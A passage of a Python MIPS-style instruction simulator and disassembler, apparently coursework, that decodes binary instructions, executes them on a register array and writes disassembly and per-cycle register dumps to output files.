registers, addresses, out1, out2, immediate):\r\n\tglobal cycle\r\n\tcycle = 1\r\n\tdata2 = data\r\n\tdataStartPoint = endPT + 1\r\n\tglobal addressList\r\n\taddressList = addresses\r\n\tdisCheck = initializeDisCheck(instruction)\r\n\t#Here comes the long list of instruction options\r\n\tfor x in range(0, endPT):\r\n\t\tif (validity[x] != True):\r\n\t\t\tprintInvalid(instruction[x], addresses[x], out1)\r\n\t\t#handle ones dealing with func next\r\n\t\telif (opCode[x] == int('100000', 2)):\r\n\t\t\tif (funcBits[x] == stdOPCodes[1][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'JR', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[4][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'ADD', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[6][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'SUB', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[9][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'SLL', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[10][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'SRL', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[12][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'AND', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[13][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'OR', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[14][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'MOVZ', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[15][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'BREAK', data2, addresses[x], out1, endPT)\r\n\t\t\t\tprintDisData(instruction, addresses, data2, x, out1)\r\n\t\t\telif (funcBits[x] == stdOPCodes[16][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'NOP', data2, addresses[x], out1, endPT)\r\n\t\t\t#handle all other cases next\r\n\t\telse:\r\n\t\t\tif (opCode[x] == stdOPCodes[0][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'J', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[11][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'MUL', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[2][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'BEQ', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[3][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'BLTZ', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[5][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'ADDI', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[7][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'SW', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[8][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'LW', data2, addresses[x], out1, endPT)\r\n\tx = 0\r\n\twhile (x < endPT):\r\n\t\t#handle ones dealing with func next\r\n\t\tif (validity[x] != True):\r\n\t\t\tcycle = cycle #needed a do nothing line so that cycle wouldn't get changed\r\n\t\telif (opCode[x] == int('100000', 2)):\r\n\t\t\tif (funcBits[x] == stdOPCodes[1][1]):\r\n\t\t\t\tx = JR(instruction[x], registers, addresses, data, addresses[x], out1, out2, endPT, data2, x, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[4][1]):\r\n\t\t\t\tADD(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[6][1]):\r\n\t\t\t\tSUB(instruction[x], 
registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[9][1]):\r\n\t\t\t\tSLL(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[10][1]):\r\n\t\t\t\tSRL(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[12][1]):\r\n\t\t\t\tAND(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[13][1]):\r\n\t\t\t\tOR(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[14][1]):\r\n\t\t\t\tMOVZ(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[15][1]):\r\n\t\t\t\tBREAK(instruction[x], registers, addresses[x], data, out1, out2, endPT, addresses, x, instruction, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[16][1]):\r\n\t\t\t\tx = SLL(instruction[x], registers, addresses, data, data2, disCheck)\r\n\t\t\tcycle = cycle + 1\r\n\t\t\t#handle all other cases next\r\n\t\telse:\r\n\t\t\tif (opCode[x] == stdOPCodes[0][0]):\r\n\t\t\t\tx = J(instruction[x], registers, addresses, data, addresses[x],out1,out2,endPT, data2, x, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[11][0]):\r\n\t\t\t\tMUL(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[2][0]):\r\n\t\t\t\tx = BEQ(instruction[x], registers, addresses, addresses[x], data, out1, out2, endPT, data2, x, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[3][0]):\r\n\t\t\t\tx = BLTZ(instruction[x], registers, addresses, addresses[x], data, out1, out2, endPT, data2, x, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[5][0]):\r\n\t\t\t\tglobal imm\r\n\t\t\t\timm = immediate[x]\r\n\t\t\t\tADDI(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[7][0]):\r\n\t\t\t\tSW(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, addresses, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[8][0]):\r\n\t\t\t\tLW(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, addresses, disCheck)\r\n\t\t\tcycle = cycle + 1\r\n\t\tx = x + 1\r\n\t\t\t\t\r\n\t\r\ndef ADD(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\t#ins is the full instruction.\r\n\t#rs is at 25-21, rt is at 20-16, rd is at 15-11\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'ADD'\r\n\t\r\n\tregisters[int(rd)] = registers[int(rs)] + registers[int(rt)]\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef ADDI(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\top = 'ADDI'\r\n\t\r\n\tglobal imm\r\n\timm = int(imm,2)\r\n\r\n\tregisters[int(rt)] = str((int(registers[rs]) + imm))\r\n\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef SUB(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'SUB'\r\n\t\r\n\tregisters[int(rd)] = registers[int(rs)] - registers[int(rt)]\r\n\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef 
MUL(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'MUL'\r\n\t\r\n\tregisters[int(rd)] = registers[int(rs)] * registers[int(rt)]\r\n\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef MOVZ(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'MOVZ'\r\n\r\n\tif (int(registers[int(rt)]) == 0):\r\n\t\tregisters[int(rd)] = registers[int(rs)]\r\n\t\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef J(ins, registers, addresses, data, address, out1, out2, endPt, data2, x, disCheck):\r\n\t#jumps to location 4*bin\r\n\taddr = bin(ins)[8:]\r\n\taddr = int(addr, 2)\r\n\taddr = addr * 4\r\n\top = 'J'\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\n\tfor y in range(0, len(addresses)):\r\n\t\tif (int(addr) == addresses[y]):\r\n\t\t\treturn (y - 1)\r\n\treturn x\t\r\n\t\t\r\ndef JR(ins, registers, addresses, data, address, out1, out2, endPt, data2, x, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\taddr = registers[rs]\r\n\top = 'JR'\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\n\tfor x in range(0, len(addresses)):\r\n\t\tif (int(addr) == addresses[x]):\r\n\t\t\treturn (x - 1)\r\n\treturn x\r\n\t\t\r\ndef BEQ(ins, registers, addresses, address, data, out1, out2, endPt, data2, x, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\timm = (int(str(bin(ins)[18:]),2) * (2 ** 2))\r\n\top = 'BEQ'\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\n\tif (rs == rt):\r\n\t\tnewAddress = (imm + 4 + address)\r\n\t\tfor y in range(0, len(addresses)):\r\n\t\t\tif (newAddress == addresses[y]):\r\n\t\t\t\treturn (y - 1)\r\n\telse:\r\n\t\treturn x\r\n\t\r\ndef BLTZ(ins, registers, addresses, address, data, out1, out2, endPt, data2, x, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\timm = (int(str(bin(ins)[18:]),2) * (2 ** 2))\r\n\top = 'BLTZ'\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\n\tif (int(registers[int(rs)]) < 0):\r\n\t\tnewAddress = (imm + 4 + address)\r\n\t\tfor y in range(0, len(addresses)):\r\n\t\t\tif (newAddress == int(addresses[y])):\r\n\t\t\t\treturn (y - 1)\r\n\telse:\r\n\t\treturn x\r\n\t\r\ndef SW(ins, registers, data, address, out1, out2, endPt, data2, addresses, disCheck):\r\n\tbase = registers[int(str(bin(ins)[8:13]),2)]\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\toffset = int(str(bin(ins))[18:],2)\r\n\tlocation = int(base) + int(offset)\r\n\top = 'SW'\r\n\t\r\n\tfor x in range(0, len(addresses)):\r\n\t\tif (location == addresses[x]):\r\n\t\t\tlocation = (x - endPt)\r\n\t\r\n\tdata[int(location)] = registers[int(rt)]\r\n\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef LW(ins, registers, data, address, out1, out2, endPt, data2, addresses, disCheck):\r\n\tbase = str(bin(ins)[8:13])\r\n\tbase = int(base,2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\toffset = int(str(bin(ins))[18:],2)\r\n\tlocation = int(str(registers[int(base)])) + int(offset)\r\n\top = 'LW'\r\n\t\r\n\tfor x in range(endPt, len(addresses)):\r\n\t\tif (location == addresses[x]):\r\n\t\t\tlocation = (x - endPt)\r\n\t\r\n\tregisters[int(rt)] = data[int(location)]\r\n\t\t\t\r\n\tprintSim(ins, 
registers, op, data, address, out2, endPt)\r\n\t\r\ndef SLL(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\tshamt = int(str(bin(ins))[23:28],2)\r\n\t\r\n\tif (int(rs) == 0 and int(rd) == 0 and int(rt) == 0):\r\n\t\t#NOP handling...\r\n\t\top = 'NOP'\r\n\t\t\r\n\telse:\r\n\t\top = 'SLL'\r\n\t\tregisters[int(rd)] = (int(int(registers[int(rt)])) * (2**(int(shamt))))\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef SRL(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\tshamt = int(str(bin(ins))[23:28],2)\r\n\top = 'SRL'\r\n\t\r\n\tregisters[int(rd)] = (registers[int(rt)] >> int(shamt))\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef AND(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'AND'\r\n\t\r\n\tregisters[int(rd)] = int(str((bin(registers[int(rs)]) & bin(registers[int(rt)]))),2)\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef OR(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'OR'\r\n\t\r\n\tregisters[int(rd)] = int(str((bin(registers[int(rs)]) | bin(registers[int(rt)]))),2)\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef BREAK(ins, registers, address, data, out1, out2, endPt, addresses, x, instructions, data2, disCheck):\r\n\top = 'BREAK'\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef initializeRegisters(registers):\r\n\tx = 0\r\n\twhile (x < 32):\r\n\t\tregisters.append(0)\r\n\t\tx = x + 1\r\n\t\t\r\ndef printDis(ins, registers, op, data, address, disOut, endPt):\r\n\t#print dis stuff\r\n\tif (op == 'J'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\t#' + str((int(bin(ins)[8:],2)) * 4) + '\\n')\r\n\telif (op == 'ADDI'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '\\n')\r\n\telif (op == 'ADD'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'JR'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + 
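Several latent bugs sit in the instruction handlers above: fields are recovered by slicing `str(bin(ins))`, which breaks whenever the word's leading bits are zero (bin() drops them); `AND`/`OR` apply `&` and `|` to bin() strings, a TypeError; and `BEQ` branches on `rs == rt` (the field values) rather than the register contents. A shift-and-mask sketch (the sample word uses the classic MIPS encoding purely to illustrate extraction; the record defines its own opcode table):

```python
def bits(word, hi, lo):
    # Shift-and-mask field extraction; unlike slicing str(bin(word)),
    # the result does not depend on bin() keeping leading zeros.
    return (word >> lo) & ((1 << (hi - lo + 1)) - 1)

ins = 0x00221820   # add $3, $1, $2 in the classic MIPS encoding
rs, rt, rd = bits(ins, 25, 21), bits(ins, 20, 16), bits(ins, 15, 11)
print(rs, rt, rd)  # 1 2 3

# AND/OR above apply & and | to bin() strings (a TypeError); the
# operators belong on the integer register values directly:
# registers[rd] = registers[rs] & registers[rt]
```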
str(int(str(bin(ins))[8:13],2)) + '\\n')\r\n\telif (op == 'SUB'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'SLL'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[23:28],2)) + '\\n')\r\n\telif (op == 'SRL'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[23:28],2)) + '\\n')\r\n\telif (op == 'MUL'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[23:34],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'MOVZ'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'OR'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'AND'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'SW'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '(' + str(int(str(bin(ins))[8:13],2)) + ')\\n')\r\n\telif (op == 'LW'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + 
' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '(' + str(int(str(bin(ins))[8:13],2)) + ')\\n')\r\n\telif (op == 'BLTZ'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[8:13],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '\\n')\r\n\telif (op == 'BEQ'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[8:13],2)) + ', ' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '\\n')\r\n\telif (op == 'NOP'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\n')\r\n\telif (op == 'BREAK'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\n')\r\n\r\ndef printDisData(instructions, addresses, data, location, disOut):\r\n\tfor x in range(1, len(data) + 1):\r\n\t\tnum = str(bin(instructions[location + x])[2:])\r\n\t\tnumLength = len(num)\r\n\t\tif (numLength != 32):\r\n\t\t\tnumToAdd = 32 - numLength\r\n\t\t\tnum = str('0' * numToAdd) + str(num)\r\n\t\tdisOut.write(str(num) + '\\t' + str(addresses[location + x]) + '\\t' + str(int(data[x - 1])) + '\\n')\r\n\t\r\ndef printSim(ins, registers, op, data, address, simOut, endPt):\r\n\t#print sim stuff that modifies registers from here\r\n\tsimOut.write('====================\\n')\r\n\tglobal imm\r\n\t\r\n\tif (op == 'J'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\t#' + str((int(bin(ins)[8:],2)) * 4) + '\\n\\n')\r\n\telif (op == 'ADDI'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', #' + str(imm) + '\\n\\n')\r\n\telif (op == 'ADD'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'JR'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(bin(ins)[8:13],2)) + '\\n\\n')\r\n\telif (op == 'SUB'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'SLL'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[23:28],2)) + '\\n\\n')\r\n\telif (op == 'SRL'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + 
str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[23:28],2)) + '\\n\\n')\r\n\telif (op == 'MUL'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[23:34],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'MOVZ'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'NOP'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\n\\n')\r\n\telif (op == 'BREAK'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\n\\n')\r\n\telif (op == 'OR'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'AND'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'SW'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', ' + str(int(str(bin(ins))[18:],2)) + '(R' + str(int(str(bin(ins))[8:13],2)) + ')\\n\\n')\r\n\telif (op == 'LW'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', ' + str(int(str(bin(ins))[18:],2)) + '(R' + str(int(str(bin(ins))[8:13],2)) + ')\\n\\n')\r\n\telif (op == 'BLTZ'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[8:13],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '\\n\\n')\r\n\telif (op == 'BEQ'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[8:13],2)) + ', ' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '\\n\\n')\r\n\t\r\n\t#outside if block:\r\n\tsimOut.write('registers:\\nr00:\\t' + str(registers[0]) + '\\t' + str(registers[1]) + '\\t' + str(registers[2]) + '\\t' + str(registers[3]) + '\\t' + str(registers[4]) + '\\t' + str(registers[5]) + '\\t' + str(registers[6]) + '\\t' + str(registers[7]))\r\n\tsimOut.write('\\nr08:\\t' + str(registers[8]) + '\\t' + 